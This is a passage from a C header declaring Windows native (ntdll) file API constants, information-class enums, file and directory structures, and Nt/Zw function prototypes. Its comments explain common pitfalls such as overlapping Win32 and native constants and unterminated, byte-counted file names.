//-----------------------------------------------------------------------------
// File functions

#ifndef OLD_DOS_VOLID
#define OLD_DOS_VOLID 0x00000008
#endif

//
// CreateDisposition values for NtCreateFile. These are NOT the Win32
// CREATE_NEW/CREATE_ALWAYS/OPEN_EXISTING/OPEN_ALWAYS/TRUNCATE_EXISTING
// constants: the numeric ranges overlap with different meanings (for example
// Win32 OPEN_EXISTING is 3, which here is FILE_OPEN_IF and would silently
// create a missing file). Always pass the FILE_* names to the native API.
//
#ifndef FILE_SUPERSEDE
#define FILE_SUPERSEDE 0x00000000                  // replace an existing file, or create
#define FILE_OPEN 0x00000001                       // open only; fail if missing
#define FILE_CREATE 0x00000002                     // create only; fail if it exists
#define FILE_OPEN_IF 0x00000003                    // open, or create if missing
#define FILE_OVERWRITE 0x00000004                  // open and truncate; fail if missing
#define FILE_OVERWRITE_IF 0x00000005               // open and truncate, or create if missing
#define FILE_MAXIMUM_DISPOSITION 0x00000005
#endif // File create flags


// Define the create/open option flags
//
// CreateOptions / OpenOptions bit mask for NtCreateFile/NtOpenFile. The
// security-relevant ones for a loader: FILE_OPEN_REPARSE_POINT opens the
// reparse point itself instead of following it (use it when the path may be
// influenced by a less-privileged party, then check the tag via
// FileAttributeTagInformation); FILE_DELETE_ON_CLOSE removes the file when the
// last handle closes; FILE_OPEN_BY_FILE_ID interprets the object name as a
// file ID rather than a path; FILE_OPEN_FOR_BACKUP_INTENT asks for backup
// semantics and is only meaningful with the backup/restore privileges.
// FILE_SYNCHRONOUS_IO_* are required for synchronous NtReadFile/NtWriteFile
// on the returned handle; without them the caller must wait on completion.
//
#ifndef FILE_DIRECTORY_FILE
#define FILE_DIRECTORY_FILE 0x00000001
#define FILE_WRITE_THROUGH 0x00000002
#define FILE_SEQUENTIAL_ONLY 0x00000004
#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_NON_DIRECTORY_FILE 0x00000040
#define FILE_CREATE_TREE_CONNECTION 0x00000080
#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
#define FILE_NO_EA_KNOWLEDGE 0x00000200
#define FILE_OPEN_FOR_RECOVERY 0x00000400
#define FILE_RANDOM_ACCESS 0x00000800
#define FILE_DELETE_ON_CLOSE 0x00001000
#define FILE_OPEN_BY_FILE_ID 0x00002000
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#define FILE_NO_COMPRESSION 0x00008000
#define FILE_RESERVE_OPFILTER 0x00100000
#define FILE_OPEN_REPARSE_POINT 0x00200000
#define FILE_OPEN_NO_RECALL 0x00400000
#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
#endif // FILE_DIRECTORY_FILE


//
// Define the I/O status information return values for NtCreateFile/NtOpenFile
//
// Delivered in IoStatusBlock->Information after a successful create/open and
// tells the caller which of the disposition outcomes actually happened.
//

#ifndef FILE_SUPERSEDED
#define FILE_SUPERSEDED 0x00000000
#define FILE_OPENED 0x00000001
#define FILE_CREATED 0x00000002
#define FILE_OVERWRITTEN 0x00000003
#define FILE_EXISTS 0x00000004
#define FILE_DOES_NOT_EXIST 0x00000005
#endif


// Completion callback type for the asynchronous I/O entry points declared
// below (NtQueryDirectoryFile and friends); the context pointer is passed
// back untouched and the status block is the one given to the original call.
#ifndef PIO_APC_ROUTINE_DEFINED
typedef
VOID
(NTAPI *PIO_APC_ROUTINE) (
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
    );
#define PIO_APC_ROUTINE_DEFINED
#endif // PIO_APC_ROUTINE_DEFINED


// Information class selector for NtQueryInformationFile / NtSetInformationFile
// / NtQueryDirectoryFile. Numbering starts at 1; the comments give the
// numeric value of each member. Classes with a "wdm" tag are the ones also
// exposed through the public WDM headers.
typedef enum _FILE_INFORMATION_CLASS
{
    FileDirectoryInformation = 1,
    FileFullDirectoryInformation,   // 2
    FileBothDirectoryInformation,   // 3
    FileBasicInformation,           // 4  wdm
    FileStandardInformation,        // 5  wdm
    FileInternalInformation,        // 6
    FileEaInformation,              // 7
    FileAccessInformation,          // 8
    FileNameInformation,            // 9
    FileRenameInformation,          // 10
    FileLinkInformation,            // 11
    FileNamesInformation,           // 12
    FileDispositionInformation,     // 13
    FilePositionInformation,        // 14 wdm
    FileFullEaInformation,          // 15
    FileModeInformation,            // 16
    FileAlignmentInformation,       // 17
    FileAllInformation,             // 18
    FileAllocationInformation,      // 19
    FileEndOfFileInformation,       // 20 wdm
    FileAlternateNameInformation,   // 21
    FileStreamInformation,          // 22
    FilePipeInformation,            // 23
    FilePipeLocalInformation,       // 24
    FilePipeRemoteInformation,      // 25
    FileMailslotQueryInformation,   // 26
    FileMailslotSetInformation,     // 27
    FileCompressionInformation,     // 28
    FileObjectIdInformation,        // 29
    FileCompletionInformation,      // 30
    FileMoveClusterInformation,     // 31
    FileQuotaInformation,           // 32
    FileReparsePointInformation,    // 33
    FileNetworkOpenInformation,     // 34
    FileAttributeTagInformation,    // 35
    FileTrackingInformation,        // 36
    FileIdBothDirectoryInformation, // 37
    FileIdFullDirectoryInformation, // 38
    FileValidDataLengthInformation, // 39
    FileShortNameInformation,       // 40
    FileIoCompletionNotificationInformation, // 41
    FileIoStatusBlockRangeInformation,       // 42
    FileIoPriorityHintInformation,           // 43
    FileSfioReserveInformation,              // 44
    FileSfioVolumeInformation,               // 45
    FileHardLinkInformation,                 // 46
    FileProcessIdsUsingFileInformation,      // 47
    FileMaximumInformation                   // 48
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;


//
// Directory enumeration records (NtQueryDirectoryFile). All of them share the
// same conventions, which are a frequent source of bugs:
//   - entries are chained by NextEntryOffset (bytes from the start of this
//     entry; 0 marks the last one), so never advance by sizeof();
//   - FileNameLength is in BYTES, not characters, and FileName is NOT
//     NUL-terminated - copy FileNameLength / sizeof(WCHAR) characters;
//   - every offset and length must be checked against the buffer size the
//     caller passed before it is dereferenced.
//

typedef struct _FILE_DIRECTORY_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;                  // bytes
    WCHAR FileName[1];                     // variable length, not NUL-terminated
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;


typedef struct _FILE_FULL_DIR_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;                  // bytes
    ULONG EaSize;
    WCHAR FileName[1];                     // variable length, not NUL-terminated
} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;


typedef struct _FILE_BOTH_DIR_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;                  // bytes
    ULONG EaSize;
    CCHAR ShortNameLength;                 // bytes used in ShortName
    WCHAR ShortName[12];                   // 8.3 name, not NUL-terminated
    WCHAR FileName[1];                     // variable length, not NUL-terminated
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;


// FileBasicInformation: timestamps and attributes; settable as well as queryable.
typedef struct _FILE_BASIC_INFORMATION {
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    ULONG FileAttributes;
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;


// FileStandardInformation: sizes, link count and delete/directory state.
typedef struct _FILE_STANDARD_INFORMATION {
    LARGE_INTEGER AllocationSize;
    LARGE_INTEGER EndOfFile;
    ULONG NumberOfLinks;
    BOOLEAN DeletePending;                 // TRUE once a delete has been requested on the file
    BOOLEAN Directory;
} FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION;


// FileInternalInformation: the file's volume-unique index (file reference).
typedef struct _FILE_INTERNAL_INFORMATION {
    LARGE_INTEGER IndexNumber;
} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;


typedef struct _FILE_EA_INFORMATION {
    ULONG EaSize;
} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;


// FileAccessInformation: the access rights actually granted on the handle.
typedef struct _FILE_ACCESS_INFORMATION {
    ACCESS_MASK AccessFlags;
} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;


// FileNameInformation: counted name, FileNameLength in bytes, no terminator.
// The kernel returns STATUS_BUFFER_OVERFLOW with a partial name when the
// buffer is too small; size the buffer from the first call's FileNameLength.
typedef struct _FILE_NAME_INFORMATION {
    ULONG FileNameLength;                  // bytes
    WCHAR FileName[1];                     // variable length, not NUL-terminated
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;


// FileRenameInformation (set only). With RootDirectory == NULL FileName is a
// full NT path; with a directory handle it is relative to that directory.
// FileNameLength is in bytes and FileName carries no terminator. The handle
// being renamed needs DELETE access.
typedef struct _FILE_RENAME_INFORMATION {
    BOOLEAN ReplaceIfExists;               // overwrite an existing target
    HANDLE RootDirectory;
    ULONG FileNameLength;                  // bytes
    WCHAR FileName[1];                     // variable length, not NUL-terminated
} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;


// FileNamesInformation: names only; same chaining rules as the other
// directory records.
typedef struct _FILE_NAMES_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    ULONG FileNameLength;                  // bytes
    WCHAR FileName[1];                     // variable length, not NUL-terminated
} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;


// FileDispositionInformation (set only). DeleteFile == TRUE marks the file
// for deletion when the last handle to it closes; the handle needs DELETE
// access.
typedef struct _FILE_DISPOSITION_INFORMATION {
    BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;


typedef struct _FILE_POSITION_INFORMATION {
    LARGE_INTEGER CurrentByteOffset;
} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;


// Extended-attribute entry: EaName holds EaNameLength characters plus a NUL,
// immediately followed by EaValueLength bytes of value. Entries chain through
// NextEntryOffset (0 = last). Validate both lengths against the buffer.
typedef struct _FILE_FULL_EA_INFORMATION {
    ULONG NextEntryOffset;
    UCHAR Flags;
    UCHAR EaNameLength;                    // excludes the terminating NUL
    USHORT EaValueLength;
    CHAR EaName[1];                        // variable length
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;
1910 | 1911 | 1912 | typedef struct _FILE_MODE_INFORMATION { 1913 | ULONG Mode; 1914 | } FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; 1915 | 1916 | 1917 | typedef struct _FILE_ALIGNMENT_INFORMATION { 1918 | ULONG AlignmentRequirement; 1919 | } FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; 1920 | 1921 | 1922 | typedef struct _FILE_ALL_INFORMATION { 1923 | FILE_BASIC_INFORMATION BasicInformation; 1924 | FILE_STANDARD_INFORMATION StandardInformation; 1925 | FILE_INTERNAL_INFORMATION InternalInformation; 1926 | FILE_EA_INFORMATION EaInformation; 1927 | FILE_ACCESS_INFORMATION AccessInformation; 1928 | FILE_POSITION_INFORMATION PositionInformation; 1929 | FILE_MODE_INFORMATION ModeInformation; 1930 | FILE_ALIGNMENT_INFORMATION AlignmentInformation; 1931 | FILE_NAME_INFORMATION NameInformation; 1932 | } FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; 1933 | 1934 | 1935 | typedef struct _FILE_ALLOCATION_INFORMATION { 1936 | LARGE_INTEGER AllocationSize; 1937 | } FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; 1938 | 1939 | 1940 | typedef struct _FILE_END_OF_FILE_INFORMATION { 1941 | LARGE_INTEGER EndOfFile; 1942 | } FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; 1943 | 1944 | 1945 | typedef struct _FILE_STREAM_INFORMATION { 1946 | ULONG NextEntryOffset; 1947 | ULONG StreamNameLength; 1948 | LARGE_INTEGER StreamSize; 1949 | LARGE_INTEGER StreamAllocationSize; 1950 | WCHAR StreamName[1]; 1951 | } FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; 1952 | 1953 | typedef struct _FILE_PIPE_INFORMATION { 1954 | ULONG ReadMode; 1955 | ULONG CompletionMode; 1956 | } FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; 1957 | 1958 | 1959 | typedef struct _FILE_PIPE_LOCAL_INFORMATION { 1960 | ULONG NamedPipeType; 1961 | ULONG NamedPipeConfiguration; 1962 | ULONG MaximumInstances; 1963 | ULONG CurrentInstances; 1964 | ULONG InboundQuota; 1965 | ULONG ReadDataAvailable; 1966 | ULONG OutboundQuota; 1967 | ULONG WriteQuotaAvailable; 1968 | ULONG 
NamedPipeState; 1969 | ULONG NamedPipeEnd; 1970 | } FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; 1971 | 1972 | 1973 | typedef struct _FILE_PIPE_REMOTE_INFORMATION { 1974 | LARGE_INTEGER CollectDataTime; 1975 | ULONG MaximumCollectionCount; 1976 | } FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; 1977 | 1978 | 1979 | typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { 1980 | ULONG MaximumMessageSize; 1981 | ULONG MailslotQuota; 1982 | ULONG NextMessageSize; 1983 | ULONG MessagesAvailable; 1984 | LARGE_INTEGER ReadTimeout; 1985 | } FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; 1986 | 1987 | 1988 | typedef struct _FILE_MAILSLOT_SET_INFORMATION { 1989 | PLARGE_INTEGER ReadTimeout; 1990 | } FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; 1991 | 1992 | 1993 | typedef struct _FILE_COMPRESSION_INFORMATION { 1994 | LARGE_INTEGER CompressedFileSize; 1995 | USHORT CompressionFormat; 1996 | UCHAR CompressionUnitShift; 1997 | UCHAR ChunkShift; 1998 | UCHAR ClusterShift; 1999 | UCHAR Reserved[3]; 2000 | } FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; 2001 | 2002 | 2003 | typedef struct _FILE_LINK_INFORMATION { 2004 | BOOLEAN ReplaceIfExists; 2005 | HANDLE RootDirectory; 2006 | ULONG FileNameLength; 2007 | WCHAR FileName[1]; 2008 | } FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; 2009 | 2010 | 2011 | typedef struct _FILE_OBJECTID_INFORMATION 2012 | { 2013 | LONGLONG FileReference; 2014 | UCHAR ObjectId[16]; 2015 | union { 2016 | struct { 2017 | UCHAR BirthVolumeId[16]; 2018 | UCHAR BirthObjectId[16]; 2019 | UCHAR DomainId[16]; 2020 | } ; 2021 | UCHAR ExtendedInfo[48]; 2022 | }; 2023 | } FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; 2024 | 2025 | 2026 | typedef struct _FILE_COMPLETION_INFORMATION { 2027 | HANDLE Port; 2028 | PVOID Key; 2029 | } FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; 2030 | 2031 | 2032 | typedef struct _FILE_MOVE_CLUSTER_INFORMATION { 2033 | ULONG 
ClusterCount; 2034 | HANDLE RootDirectory; 2035 | ULONG FileNameLength; 2036 | WCHAR FileName[1]; 2037 | } FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; 2038 | 2039 | 2040 | typedef struct _FILE_NETWORK_OPEN_INFORMATION { 2041 | LARGE_INTEGER CreationTime; 2042 | LARGE_INTEGER LastAccessTime; 2043 | LARGE_INTEGER LastWriteTime; 2044 | LARGE_INTEGER ChangeTime; 2045 | LARGE_INTEGER AllocationSize; 2046 | LARGE_INTEGER EndOfFile; 2047 | ULONG FileAttributes; 2048 | } FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; 2049 | 2050 | 2051 | typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { 2052 | ULONG FileAttributes; 2053 | ULONG ReparseTag; 2054 | } FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; 2055 | 2056 | 2057 | typedef struct _FILE_TRACKING_INFORMATION { 2058 | HANDLE DestinationFile; 2059 | ULONG ObjectInformationLength; 2060 | CHAR ObjectInformation[1]; 2061 | } FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; 2062 | 2063 | 2064 | typedef struct _FILE_REPARSE_POINT_INFORMATION { 2065 | LONGLONG FileReference; 2066 | ULONG Tag; 2067 | } FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; 2068 | 2069 | 2070 | typedef struct _FILE_QUOTA_INFORMATION { 2071 | ULONG NextEntryOffset; 2072 | ULONG SidLength; 2073 | LARGE_INTEGER ChangeTime; 2074 | LARGE_INTEGER QuotaUsed; 2075 | LARGE_INTEGER QuotaThreshold; 2076 | LARGE_INTEGER QuotaLimit; 2077 | SID Sid; 2078 | } FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; 2079 | 2080 | 2081 | typedef struct _FILE_ID_BOTH_DIR_INFORMATION { 2082 | ULONG NextEntryOffset; 2083 | ULONG FileIndex; 2084 | LARGE_INTEGER CreationTime; 2085 | LARGE_INTEGER LastAccessTime; 2086 | LARGE_INTEGER LastWriteTime; 2087 | LARGE_INTEGER ChangeTime; 2088 | LARGE_INTEGER EndOfFile; 2089 | LARGE_INTEGER AllocationSize; 2090 | ULONG FileAttributes; 2091 | ULONG FileNameLength; 2092 | ULONG EaSize; 2093 | CCHAR ShortNameLength; 2094 | WCHAR ShortName[12]; 2095 | LARGE_INTEGER 
FileId;
    WCHAR FileName[1];
} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;


// Directory entry returned for the FileIdFullDirectoryInformation class.
// FileName[1] is the conventional variable-length trailer: bound any read
// of it by FileNameLength (bytes), and walk to the next entry with
// NextEntryOffset (0 marks the last entry of the buffer).
typedef struct _FILE_ID_FULL_DIR_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;
    ULONG EaSize;
    LARGE_INTEGER FileId;
    WCHAR FileName[1];
} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;


typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
    LARGE_INTEGER ValidDataLength;
} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;

// One hard-link entry; FileName[1] is again a FileNameLength-bounded trailer.
typedef struct _FILE_LINK_ENTRY_INFORMATION {
    ULONG NextEntryOffset;
    LONGLONG ParentFileId;
    ULONG FileNameLength;
    WCHAR FileName[1];
} FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION;

// Header of a hard-link listing: BytesNeeded reports the buffer size the
// full listing requires, EntriesReturned how many entries follow Entry.
typedef struct _FILE_LINKS_INFORMATION {
    ULONG BytesNeeded;
    ULONG EntriesReturned;
    FILE_LINK_ENTRY_INFORMATION Entry;
} FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION;



// Volume (file-system) information classes for Nt/ZwQueryVolumeInformationFile.
// Numbering starts at 1, matching the values in the trailing comments.
typedef enum _FSINFOCLASS {
    FileFsVolumeInformation = 1,
    FileFsLabelInformation,         // 2
    FileFsSizeInformation,          // 3
    FileFsDeviceInformation,        // 4
    FileFsAttributeInformation,     // 5
    FileFsControlInformation,       // 6
    FileFsFullSizeInformation,      // 7
    FileFsObjectIdInformation,      // 8
    FileFsDriverPathInformation,    // 9
    FileFsMaximumInformation
} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;


// Native file-object API. Each Nt* routine below has a Zw* twin with an
// identical signature; from user mode both names resolve to the same
// ntdll export, so the pairs are listed for completeness only.

NTSYSAPI
NTSTATUS
NTAPI
NtCreateFile(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer,
    IN ULONG EaLength);


NTSYSAPI
NTSTATUS
NTAPI
ZwCreateFile(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer,
    IN ULONG EaLength);


NTSYSAPI
NTSTATUS
NTAPI
NtOpenFile(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG ShareAccess,
    IN ULONG OpenOptions
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwOpenFile(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG ShareAccess,
    IN ULONG OpenOptions
    );


// Length is the size in bytes of the caller-supplied FileInformation buffer;
// the required layout depends on FileInformationClass.
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwQueryInformationFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass
    );


// Enumerates a directory into FileInformation (Length bytes). With
// ReturnSingleEntry FALSE the buffer holds a NextEntryOffset-linked chain
// of entries such as FILE_ID_FULL_DIR_INFORMATION above.
NTSYSAPI
NTSTATUS
NTAPI
NtQueryDirectoryFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass,
    IN BOOLEAN ReturnSingleEntry,
    IN PUNICODE_STRING FileName OPTIONAL,
    IN BOOLEAN RestartScan
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwQueryDirectoryFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass,
    IN BOOLEAN ReturnSingleEntry,
    IN PUNICODE_STRING FileName OPTIONAL,
    IN BOOLEAN RestartScan
    );


NTSYSAPI
NTSTATUS
NTAPI
NtQueryVolumeInformationFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FsInformation,
    IN ULONG Length,
    IN FS_INFORMATION_CLASS FsInformationClass
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwQueryVolumeInformationFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FsInformation,
    IN ULONG Length,
    IN FS_INFORMATION_CLASS FsInformationClass
    );


NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwSetInformationFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass
    );


// Extended-attribute query; EaList/EaIndex are optional filters.
NTSYSAPI
NTSTATUS
NTAPI
NtQueryEaFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID Buffer,
    IN ULONG Length,
    IN BOOLEAN ReturnSingleEntry,
    IN PVOID EaList OPTIONAL,
    IN ULONG EaListLength,
    IN PULONG EaIndex OPTIONAL,
    IN BOOLEAN RestartScan);


NTSYSAPI
NTSTATUS
NTAPI
ZwQueryEaFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID Buffer,
    IN ULONG Length,
    IN BOOLEAN ReturnSingleEntry,
    IN PVOID EaList OPTIONAL,
    IN ULONG EaListLength,
    IN PULONG EaIndex OPTIONAL,
    IN BOOLEAN RestartScan);


NTSYSAPI
NTSTATUS
NTAPI
NtSetEaFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID Buffer,
    IN ULONG Length);


NTSYSAPI
NTSTATUS
NTAPI
ZwSetEaFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID Buffer,
    IN ULONG Length);


// Reads up to Length bytes into Buffer. The byte count actually transferred
// is reported through IoStatusBlock, not the return value; Event/ApcRoutine
// only matter for asynchronous handles.
NTSYSAPI
NTSTATUS
NTAPI
NtReadFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID Buffer,
    IN ULONG Length,
    IN PLARGE_INTEGER ByteOffset OPTIONAL,
    IN PULONG Key OPTIONAL
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwReadFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID Buffer,
    IN ULONG Length,
    IN PLARGE_INTEGER ByteOffset OPTIONAL,
    IN PULONG Key OPTIONAL
    );


NTSYSAPI
NTSTATUS
NTAPI
NtWriteFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID Buffer,
    IN ULONG Length,
    IN PLARGE_INTEGER ByteOffset OPTIONAL,
    IN PULONG Key OPTIONAL
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwWriteFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID Buffer,
    IN ULONG Length,
    IN PLARGE_INTEGER ByteOffset OPTIONAL,
    IN PULONG Key OPTIONAL
    );


// Deletes by name (ObjectAttributes), without an open handle.
NTSYSAPI
NTSTATUS
NTAPI
NtDeleteFile(
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwDeleteFile(
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );


NTSYSAPI
NTSTATUS
NTAPI
NtFlushBuffersFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock
    );


NTSYSAPI
NTSTATUS
NTAPI
ZwFlushBuffersFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock
    );


// Unlike the read/write prototypes above, Event/ApcRoutine/ApcContext are
// not marked OPTIONAL here; that is how the original header declares them.
NTSYSAPI
NTSTATUS
NTAPI
NtDeviceIoControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event,
    IN PIO_APC_ROUTINE ApcRoutine,
    IN PVOID ApcContext,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
